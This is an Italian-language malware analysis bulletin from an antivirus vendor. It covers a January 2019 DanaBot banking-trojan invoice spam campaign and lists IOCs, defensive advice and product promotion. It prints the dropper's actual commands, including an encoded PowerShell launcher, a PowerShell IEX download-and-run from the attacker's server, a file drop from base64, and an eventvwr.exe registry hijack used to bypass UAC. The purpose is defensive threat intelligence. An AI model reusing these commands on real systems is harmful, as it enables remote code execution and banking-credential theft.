11/01/2019
12:42

DanaBot torna a far parlare di se anche nel 2019!

DanaBot ritorna con l'anno nuovo! Ecco come la Campagna di MailSpam del noto Malware Danabot millanta un'errore nella fatturazione per insediarsi nel pc del malcapitato!
      
 
 
 

Analisi da parte del C.R.A.M. (Centro di Ricerca Anti-Malware) di TG Soft di una delle mail che diffonde il malware Trojan Banker DanaBot  in data  11 Gennaio 2019.


Per gli invii massivi di mail fraudolente, vengono utilizzati i metodi di "ingegneria sociale" che sono sviluppati da persone/cyber-criminali per indurre la vittima ad aprire gli allegati infetti oppure a cliccare sui link presenti nel corpo del messaggio.

INDICE
Se hai ricevuto un email sospetta, inviala al C.R.A.M. (Centro di Ricerca Anti-Malware): Come inviare mail sospette

Falsa Mail diffonde Trojan "DanaBot"

Nome:DanaBot
Famiglia malware: Banker
VirIT: Trojan.Win32.DanaBot.BFQ

Descrizione:
La mail è stata rilevata in data 11 Gennaio 2019

Esempio di email analizzata:

Oggetto: fattura-975

 
 immagine_1
ingrandire immagine
 

 
fattura-975 - Mozilla Thunderbird
Da:                          
Oggetto: fattura-975
A:                           		 
buon giorno,
Si prega di risolvere. Sto inviando un elenco di fatture, compresa una fattura dopo la scadenza.
Dati di fatturazione: 
http[:]//syicatalogs[.]bayareacommercial[.]com/facilities/gforge[.]php?email=39f8d@a9742
Con rispetto
Enrico Ciliberti
Tecnoforniture Italia Srl

---------------------------------------------

 
1 allegato: __faktura_9891.zip
 
 

Torna ad inizio pagina

Come si diffonde:
Il malware si diffonde via e-mail ingannevole in cui ci viene notificato un'elenco di fatture che si possono trovare al link malevolo 
http[:]//syicatalogs[.]bayareacommercial[.]com/facilities/gforge[.]php?email=39f8d@a9742 .
Cliccando il link verrà scaricato un file Zip "_faktura_9891.zip" contenente il file __faktura_[numero casuale].vbs, che una volta eseguito darà il via al meccanismo d'infezione.

Archivio:
  • Nome File: _faktura_9891.zip
  • Dimensione: 508 byte
  • Md56CAAC7DDD89973571E0EC34490F7BA70
File:
  • Nome File: _faktura_[numero casuale].vbs
  • Dimensione: 651 byte
  • Md50EAEF9C80B2FC58A57EA7AF1EEBEF5AC
  • Famiglia malwareDropper
  • VirIT: Trojan.VBS.Dropper.BFQ
Il file __faktura_[numero casuale].vbs nel momento in cui viene eseguito agli occhi del malcapitato utente sembrerà non avvenire nulla se non l'apertura di una finestra di windows contente lo stesso numero casuale che troviamo nel nome del file.
In realtà il file è in esecuzione e resta in attesa finchè non viene visualizzato un comando diverso da "WScript.Sleep XXXX" nel sito a cui
il dropper fa riferimento "https[:]//serviceussupport[.]info//" , nella nostra analisi si sono susseguiti i comandi riportati di seguito :

Dim Pizde12323, pow231323, pow2234234, nnnn12313:set ZFjkk68932=CreateObject("shell.application"):Pizde12323 =[..]"

oAJwApADsA":pow231323 = "cm":pow2234234 = pow231323 + "d":nnnn12313 =0:ZFjkk68932.ShellExecute pow2234234, " /c po^w^er" + "shell -E^nc " + Chr(34)+Pizde12323 + Chr(34) + "", "", "open", nnnn12313:set ZFjkk68932 = nothing

Con questo comando il dropper esegue una connessione al sito "https[:]//infosevicues[.]info[:]443/chkesosod/downs/iZj"  e tramite una
stringa in esso contenuta esegue uno script di Powershell che comincia a scambiare informazioni con il server "C&C" tramite "NET.TCP"
(Questo comando verrà eseguito più volte durante il funzionamento del malware).
Di seguito alcuni comandi per raccogliere informazioni sul sistema:

try {"6f7074696f6e73Memory";$Memory = Get-WmiObject -Class Win32_ComputerSystem;$Memory.TotalPhysicalMemory}catch{"null"}

try {"6f7074696f6e73byte"; (Get-Process -Id $PID).StartInfo.EnvironmentVariables["PROCESSOR_ARCHITECTURE"];}catch{"null"}

try {"6f7074696f6e73syslang"; $syslang = get-host; $syslang.CurrentCulture;}catch{"null"}
 

Dopo altri minuti di attesa vengono eseguite nuove istruzioni che indicano al dropper di scaricare il file del DanaBot

Dim ztempfolder:Dim mfso:Dim tobjXML:Dim aobjDocElem:Dim lobjStream:Dim FileName:Const MAadSaveCreateOverWrite = 2 :Const MsadTypeBinary = 1:Set mfso = CreateObject("Scripting.FileSystemObject"):ztempfolder =mfso.GetSpecialFolder(2):Set tobjXML =CreateObject("MSXml2.DOMDocument"):Set aobjDocElem =tobjXML.createElement("Base64Data"):aobjDocElem.DataType ="bin.base64":aobjDocElem.text = " [BASE64-ENCODED FILE]"
 
una volta completato il download viene salvato in "%Temp%" dell'utente con il nome "fqBtRuEUSpy"

Set lobjStream = CreateObject("ADODB.Stream"):lobjStream.Type =MsadTypeBinary:lobjStream.Open():lobjStream.Write aobjDocElem.NodeTypedValue:FileName = ztempfolder + "\fqBtRuEUSpy":lobjStream.SaveToFile FileName, MAadSaveCreateOverWrite:IF mfso.FileExists(FileName)  Then:   sss = "1":Else:   sss = "offile"   :End if:Set ztempfolder = Nothing:Set mfso = Nothing:Set tobjXML = Nothing:Set aobjDocElem = Nothing:Set lobjStream = Nothing:Set FileName = Nothing
 
e rinominato il file con il suo nome finale "fqBtRuEUSpy.dll"
 

Dim kobjFso, ktempfolder  :Set kobjFso= CreateObject("Scripting.FileSystemObject")  :ktempfolder =kobjFso.GetSpecialFolder(2):kobjFso.MoveFile ktempfolder + "\fqBtRuEUSpy", ktempfolder + "\fqBtRuEUSpy.dll"
 
  • Nome File: fqBtRuEUSpy.dll
  • Dimensione: 310.272 byte
  • Md580D58221D48F486E0F760296DD942927 
  • Famiglia malwareDanaBot
  • VirIT: Trojan.Win32.DanaBot.BFQ
Ora che la "DLL" malevola è stata scaricata correttamente nel computer della vittima, questa viene avviata tramite il processo "Rundll32.exe":

Dim KobjShell, DobjFso, zdtempfolder, SFileName:Set KobjShell =CreateObject("Shell.Application"):Set DobjFso=CreateObject("Scripting.FileSystemObject")  [...]"C:\Windows\System32\rundll32.exe", zdtempfolder + "\fqBtRuEUSpy.dll,f1", "", "open", 1:Set KobjShell = Nothing:Set DobjFso = Nothing:Set zdtempfolder =Nothing:
 
subito dopo viene eseguito un tentativo da parte del payload (non riuscendo a collegarsi) di scaricare la seconda "DLL" del DanaBot.
 
Quindi sfruttando il processo di windows eventvwr.exe  scrive nel registro del sistema operativo la seguente chiave:

Set WSobj = CreateObject("WScript.Shell"):   Set objFsos =CreateObject("Scripting.FileSystemObject")  :  Set tempfolder = objFsos.GetSpecialFolder(2):   WSobj.RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", "":   WSobj.RegWrite HKCU\Software\Classes\mscfile\shell\open\command\", "C:\WINDOWS\System32\rundll32.exe " + tempfolder + "\fqBtRuEUSpy.dll,f1", "REG_SZ":   WSobj.Run ("%windir%\system32\eventvwr.exe"):   WScript.Sleep 2000:   WSobj.Run ("%windir%\system32\compmgmt.msc /s"):   Set WSobj = Nothing:   Set objFsos = Nothing: 
 
[HKCU\Software\Classes\mscfile\shell\open\command\]
"DisplayName"="@="C:\WINDOWS\System32\rundll32.exe C:\Users\Cram7eng\AppData\Local\Temp\fqBtRuEUSpy.dll,f1"

Viene quindi eseguito un nuovo tentativo da parte di  "fqBtRuEUSpy.dll" (non riuscendo ancora a collegarsi) di download ed esecuzione del secondo file del DanaBot

Dim objShell, objFso, tempfolder:Set objShell = CreateObject("Shell.Application"):Set objFso= CreateObject("Scripting.FileSystemObject")  :Set tempfolder = objFso.GetSpecialFolder(2):objShell.ShellExecute "powershell", "powershell -EncodedCommand $path = '/fax.php?id=admin'; $hostname = 'serviceussupport.info'; IEX(New-Object Net.Webclient).downloadstring('http://' + $hostname + $path);=", "", "runas", 0:Set objShell = Nothing:Set objFso = Nothing:Set tempfolder = Nothing
  

C:\WINDOWS\System32\rundll32.exe "C:\WINDOWS\System32\rundll32.exe" C:\Users\[User]\AppData\Local\Temp\fqBtRuEUSpy.dll
 
vengono quindi eliminate delle chiavi di registro 

 Set WSobj = CreateObject("WScript.Shell"):WSobj.RegDelete "HKCU\Software\Classes\exefile\shell\open\command\":    WSobj.RegDelete "HKCU\Software\Classes\exefile\shell\open\":    WSobj.RegDelete "HKCU\Software\Classes\exefile\shell\":    WSobj.RegDelete "HKCU\Software\Classes\exefile\": WSobj.RegDelete "HKCU\Software\Classes\mscfile\shell\open\command\": WSobj.RegDelete "HKCU\Software\Classes\mscfile\shell\open\":  WSobj.RegDelete "HKCU\Software\Classes\mscfile\shell\":  WSobj.RegDelete "HKCU\Software\Classes\mscfile\": Set WSobj = Nothing
 
ed in fine lo script viene messo in attesa dallo stesso comando "WScript.Sleep XXXX" visto all'inizio dell'analisi.
 

Il Trojan.Win32.DanaBot fa parte della macrofamiglia dei Banker, le sue peculiarità sono:
  • carpire login e password di accesso a siti importanti come home banking, posta elettronica, ftp etc...
  • permettere all'attacante di controllare il pc da remoto.

IOC

MD5:
80D58221D48F486E0F760296DD942927
0EAEF9C80B2FC58A57EA7AF1EEBEF5AC
6CAAC7DDD89973571E0EC34490F7BA70

URL:
https[:]//serviceussupport[.]info/
http[:]//syicatalogs[.]bayareacommercial[.]com/facilities/gforge[.]php?email=39f8d@a9742
infosevicues[.]info
 
IP:
117[.]189[.]204[.]218
92[.]185[.]0[.]32
104[.]229[.]74[.]68
166[.]123[.]37[.]165
35[.]89[.]11[.]198
56[.]248[.]10[.]80
192[.]71[.]249[.]50
78[.]251[.]240[.]124
50[.]243[.]41[.]122
149[.]154[.]157[.]106
92[.]185[.]0[.]32
 
Torna ad inizio pagina

 

Come cercare di riconoscere una falsa mail

L'esperienza ed il buon senso sono le prime armi per non rimanere vittima di questo tipo di truffe.
E' fondamentale un'attenta lettura della mail, in tutti i suoi elementi. Diffidare da subito di allegati in formato ZIP e, se possibile, NON abilitare l'esecuzione automatica delle macro. E' fortemente sconsigliato impostare l'esecuzione automatica delle macro poichè la semplice apertura di file Word ed Excel vedrà l'immediata esecuzione delle macro senza alcun alert preventivo.
Nel caso in cui si fosse stati infettati da un Banker,  il consiglio da parte del C.R.A.M. di TG Soft è quello di prendere opportuni accorgimenti di sicurezza anche dopo la bonifica del/dei sistemi coinvolti come il cambio delle password più comunemente utilizzate nel web.
Nel caso in cui  la postazione coinvolta fosse stata utilizzata per operazioni di home-banking è consigliato anche un accertamento con il proprio istituto di credito.  


Come inviare e-mail sospette per l'analisi come possibili virus/malware/ransomware e/o tentativi di Phishing

L'invio di materiali da analizzare al Centro Ricerche Anti-Malware di TG Soft per l'analisi che è sempre e comunque gratuito può avvenire in tutta sicurezza in due modalità:
  1. qualsiasi e-mail che sia da considerarsi sospetta può essere inviata direttamente dalla posta elettronica del ricevente scegliendo come modalità di invio "INOLTRA come ALLEGATO" e inserendo nell'oggetto "Possibile Phishing da verificare" piuttosto che "Possibile Malware da verificare" alla mail lite@virit.com
  2. salvare come file esterno al programma di posta elettronica utilizzato la mail da inviare al C.R.A.M. di TG Soft per l'analisi . Il file che ne risulterà dovrà essere inviato facendone l'Upload dalla pagina di INVIO File Sospetti (http://www.tgsoft.it/italy/file_sospetti.asp). Naturalmente per avere un feed-back rispetto al responso dell'analisi dei file infetti inviati sarà necessario indicare un indirizzo e-mail e sarà gradita una breve descrizione del motivo dell'invio del file (ad esempio: possibile/probabile phishing; possibile/probabile malware o altro).
Tutto questo per aiutare ad aiutarvi cercando di evitare che possiate incappare in furti di credenziali, virus/malware o ancor peggio Ransomware / Crypto-Malware di nuova generazione.
Torna ad inizio pagina
 


Integra la protezione del tuo PC/SERVER con Vir.IT eXplorer Lite

Se non doveste ancora utilizzare Vir.IT eXplorer PRO è consigliabile installare, ad integrazione dell'antivirus in uso per aumentare la sicurezza dei vostri computer, PC e SERVER indifferentemente, Vir.IT eXplorer Lite -FREE Edition-.

Vir.IT eXplorer Lite ha le seguenti caratteristiche peculiari:
  • liberamente utilizzabile sia in ambito privato sia in ambito aziendale con aggiornamenti Motore+Firme senza limitazioni temporali;
  • interoperabile con eventuali altri AntiVirus, AntiSpyware, AntiMalware o Internet Security già presenti su PC e SERVER, consigliato l'utilizzo ad integrazione dell'AntiVirus già in uso poichè non conflitta nè rallenta il sistema ma permette di aumentare sensibilmente la sicurezza in termini di identificazione e bonifica dei file infetti;
  • identifica e, in moltissimi casi, anche rimuove la maggior parte dei virus/malware realmente circolanti o, in alternativa, ne permette l'invio al C.R.A.M. Centro Ricerche Anti-Malware di TG Soft per l'analisi e l'aggiornamento di Vir.IT eXplorer per l'univoca identificazione e la corretta rimozione;
  • grazie alla tecnologia Intrusione Detection, resa disponibile anche nella versione Lite di Vir.IT eXplorer, il software è in grado di segnalare eventuali virus/malware di nuova generazione che si siano posti in esecuzione automatica e procedere all'invio dei file segnalati al C.R.A.M. di TG Soft.
  • Procedi al  download di Vir.IT eXplorer Lite dalla pagina ufficiale di distribuzione del sito di TG Soft.

Per i licenziatari in assistenza della versione PRO di Vir.IT eXplorer...

Per i possessori di Vir.IT eXplorer PRO è anche possibile contattare gratuitamente il supporto tecnico telefonico di TG Soft le cui modalità sono consultabili alla pagina del supporto CLIENTI.
 


C.R.A.M.
Centro Ricerche Anti-Malware di TG Soft

Torna ad inizio pagina




Ogni informazioni pubblicata sul nostro sito può essere utilizzata e pubblicata su altri siti internet, blog, forum, facebook e/o in ogni altra forma sia in modalità cartacea che elettronica a patto che venga sempre e comunque citata la fonte esplicitamente “Fonte: C.R.A.M. by TG Soft www.tgsoft.it” con link cliccabile all'informativa e/o pagina web originale da cui sono stati estrapolati contenuti testuali, spunti e/o immagini.

Sarà gradito nel caso di utilizzo dell'informativa del C.R.A.M. by TG Soft www.tgsoft.it nella relazione di articoli di sintesi il riconoscimento/ringraziamento di seguito “Si ringrazia il Centro Ricerche Anti-Malware C.R.A.M. by TG Soft di cui segnaliamo il link diretto all'informativa originale:[link diretto cliccabile]”

Vir.IT eXplorer PRO è certificato dai maggiori enti internazionali: